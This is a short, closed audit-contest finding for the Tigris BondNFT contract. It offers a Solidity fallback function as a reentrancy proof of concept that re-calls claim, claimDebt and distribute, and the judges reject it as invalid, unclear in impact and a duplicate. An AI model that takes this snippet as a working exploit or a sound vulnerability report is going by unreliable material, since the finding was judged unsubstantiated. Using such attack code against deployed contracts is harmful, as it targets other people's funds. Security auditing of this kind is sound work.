Closed code423n4 closed 1 year ago
https://github.com/gbadebosmith/ouch/blob/a77e6c2e74a3d18f879ab97fbf1ed31cd4180b65/AttackBondNFT.sol#L192-L207
Reentrancy attack that uses fallback to call the functions named claim, claimDebt, and distribute via attack file.
- sourcecode: https://github.com/code-423n4/2022-12-tigris/blob/main/contracts/BondNFT.sol
- victim sourcecode: https://github.com/gbadebosmith/ouch/blob/main/BondNFT.sol
- attack code: https://github.com/gbadebosmith/ouch/blob/main/AttackBondNFT.sol

```solidity
fallback() external payable {
    if (1==1) {
        bondnftfx.claim(
            2345678901,
            0xc59dFC955c26493c3E5Ac068A308CB787CCE34e6
        );
        bondnftfx.claimDebt(
            _owner,
            0xc59dFC955c26493c3E5Ac068A308CB787CCE34e6
        );
        bondnftfx.distribute(
            0xc59dFC955c26493c3E5Ac068A308CB787CCE34e6,
            33
        );
    }
}
```
Remix IDE
Unclear what the impact is. You've reentered; what did you get?
GalloDaSballo marked the issue as unsatisfactory: Invalid
Closing as dup by same warden (but confusing content)
Please write more